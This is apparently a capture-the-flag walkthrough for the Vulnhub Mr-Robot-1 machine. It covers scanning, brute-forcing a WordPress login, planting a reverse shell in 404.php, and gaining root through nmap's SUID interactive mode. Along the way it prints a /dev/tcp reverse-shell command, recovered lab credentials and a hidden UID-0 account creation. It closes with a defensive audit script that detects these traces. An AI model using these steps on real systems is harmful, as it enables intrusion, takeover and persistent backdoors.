Vulnhub-23mrRobot-1

Information gathering

arp-scan -l
nmap --min-rate 100000 -p- 192.168.240.132
nmap --min-rate 100000 -p22,80,443 -A 192.168.240.132

dirsearch -u 192.168.240.132
dirb http://192.168.240.132/
nikto -host 192.168.240.132 -p 80

Port 22

22/tcp  closed ssh

Port 80

80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

└─# nikto -host 192.168.240.132 -p 80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.240.132
+ Target Hostname: 192.168.240.132
+ Target Port: 80
+ Start Time: 2024-12-01 09:14:42 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /3TVZlj5i.asmx: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /admin/: This might be interesting.
+ /image/: Drupal Link header found with value: <http://192.168.240.132/?p=23>; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2024-12-01 09:16:26 (GMT8) (104 seconds)
A robots.txt exists; it points to a wordlist and a key file.

Port 443

443/tcp open   ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

└─# nikto -host 192.168.240.132 -p 443
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.240.132
+ Target Hostname: 192.168.240.132
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /CN=www.example.com
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /CN=www.example.com
+ Start Time: 2024-12-01 09:15:21 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The site uses TLS and the Strict-Transport-Security HTTP header is not defined. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /uN3ftIqo.sys: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /: The Content-Encoding header is set to "deflate" which may mean that the server is vulnerable to the BREACH attack. See: http://breachattack.com/
+ Hostname '192.168.240.132' does not match certificate's names: www.example.com. See: https://cwe.mitre.org/data/definitions/297.html
+ /admin/: This might be interesting.
+ /image/: Drupal Link header found with value: <https://192.168.240.132/?p=23>; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the secure flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8103 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time: 2024-12-01 09:18:55 (GMT8) (214 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The same robots.txt and wordlist file are present here as well.

Exploitation

Port 80

1. Brute-force the login page with the wordlist (cluster bomb mode); this yields the credentials elliot // ER28-0652


Locate 404.php, put a reverse shell in it, then visit http://192.168.240.132/wp-content/themes/twentyfifteen/404.php or simply http://192.168.240.132/404.php
Once the shell connects, upgrade it to an interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'
Interactive shell: bash -i


Port 443

The steps are identical, so no separate exploitation is done for this port.

Privilege escalation

Information gathering

daemon@linux:/$ ls /home/robot
key-2-of-3.txt: readable only with robot privileges (822c73956184f694993bede3eb39f959). password.raw-md5: c3fcd3d76192e4007dfb496cca67e13b, which an MD5 lookup resolves to abcdefghijklmnopqrstuvwxyz


Privilege escalation

SUID privilege escalation
Use find to list every SUID executable on the system: find / -perm -u=s -type f 2>/dev/null


Either sudo or nmap can be used.
sudo refuses, so try nmap.
nmap --interactive opens the interactive prompt
Type !sh
Create a root account: useradd -u 0 -o -g 0 -G root -s /bin/bash -d /home/root2 -m root2, then set the password: sudo passwd root1
/bin/bash -i >& /dev/tcp/192.168.240.130/1112 0>&1 for the reverse shell, but the terminal then cannot interpret the arrow-key escape sequences correctly
In that case persistence by changing the uid does not work; it is better to start port 22 and log in as robot over SSH (service ssh start), then escalate with nmap
Or edit /etc/passwd directly with nano. A small hiccup here: after I changed robot's uid and gid, the user id did not change; I logged out of the SSH session, got a fresh reverse shell, and ran su robot again
After entering the password I found I had become root.

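Added example, not code from the original writeup: a defender-side audit for the two traces this escalation leaves on the host, an extra UID-0 account in /etc/passwd (root2, or a hand-edited uid) and a SUID binary such as nmap that is not in the host's baseline. The passwd lines, baseline set and SUID list below are constructed sample data.

```python
from __future__ import annotations
import os
import stat


def uid0_accounts(passwd_text: str) -> list[str]:
    """Return account names with UID 0 other than 'root'.
    Flags both an added root2 account and an edited uid field."""
    extras = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue  # malformed entry: skip instead of crashing the audit
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            extras.append(name)
    return extras


def find_suid(root: str = "/") -> list[str]:
    """Set-uid regular files under root, like `find / -perm -u=s -type f`."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(found: list[str], baseline: set[str]) -> list[str]:
    """SUID files that are not in the host's known-good baseline."""
    return sorted(p for p in found if p not in baseline)


# Constructed sample data (not taken from the target): the stock root entry
# plus the root2 account the writeup creates, and a SUID list in which
# /usr/local/bin/nmap is the entry a stock baseline would not contain.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
robot:x:1002:1002::/home/robot:/bin/sh
root2:x:0:0::/home/root2:/bin/bash
"""
SAMPLE_BASELINE = {"/bin/su", "/usr/bin/passwd", "/usr/bin/sudo"}
SAMPLE_SUID = ["/usr/bin/passwd", "/usr/local/bin/nmap", "/bin/su", "/usr/bin/sudo"]
```

On a live host, run uid0_accounts over the contents of /etc/passwd and unexpected_suid(find_suid(), baseline) with a baseline captured from a clean install.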